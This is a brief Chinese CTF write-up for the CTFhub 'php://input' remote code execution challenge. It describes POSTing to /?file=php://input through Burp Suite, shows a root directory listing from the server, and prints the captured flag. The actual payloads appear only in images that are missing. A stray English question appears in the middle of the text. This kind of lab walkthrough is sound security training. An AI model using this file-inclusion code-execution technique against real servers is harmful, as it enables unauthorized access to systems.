CTFhub-RCE-php://input

我们需要使用php://input来构造发送的指令
查看phpinfo,找到一下字段
在这里插入图片描述
证明是可以使用php://input

1.   使用Burpsuite抓包并转至Repeater

CTFhub-RCE-php://input_第1张图片

2. 构造包

方法:POST
目标:/?file=php://input
Body:

CTFhub-RCE-php://input_第2张图片

响应:

HTTP/1.1 200 OK
Server: openresty/1.21.4.2
Date: Mon, 13 Nov 2023 08:59:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 178
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *

bin
boot
dev
etc
flag_13803
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var



i don't have shell, how to get flag?

phpinfo

3. 使用cat访问flag_xxx

CTFhub-RCE-php://input_第3张图片

flag: 
ctfhub{3dca56f1cd6b532d39ac2bde}

CTFhub-RCE-php://input_第4张图片

你可能感兴趣的:(CTFhub-RCE,php,开发语言)